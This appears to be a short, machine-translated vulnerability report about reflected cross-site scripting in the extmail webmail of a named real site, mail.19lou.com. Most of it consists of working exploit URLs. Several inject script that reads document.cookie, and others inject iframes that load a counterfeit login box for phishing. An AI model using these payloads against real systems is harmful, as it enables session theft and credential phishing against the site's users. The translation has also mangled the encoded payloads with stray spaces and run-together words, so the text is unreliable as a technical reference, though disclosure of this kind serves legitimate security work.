1. Cross Site 2. forged login box Mailbox System: https://mail.19lou.com/extmail/cgi/index.cgi extmail reflection of Cross Site, https://mail.19lou.com/extmail/cgi/index.cgi? _ Mode = % 3 Cscript % 3 Ealert % 28document. cookie % 29% 3C/script % 3E & error = badlogi https://mail.19lou.com//extman/cgi/signup.cgi? Domain = % 3 Cscript % 3 Ealert % 28document. cookie % 29% 3C/script % 3... load ifreamhttps: // mail.19lou.com//extman/cgi/signup.cgi? Domain = % 3 Ciframe % 20src = % 22 http://wooyun.org % 22% 20 width = % 22500% 22% 20 height = % 22180% 22% 3E & error = badlogi (FIG) Counterfeit login box https://mail.19lou.com/extmail/cgi/index.cgi? _ Mode = % 22% 3E % 3 Ciframe % 20src = % 22 http: // 127.0.0.1/false.htm % 22% 20 width = % 22800% 22% 20 height = % 22980% 22% 20 frameborder = 0% 20% 3E % 20 & error = badlogi counterfeit effect OK: External false.htm content
Solution:It seems that the version is a little old.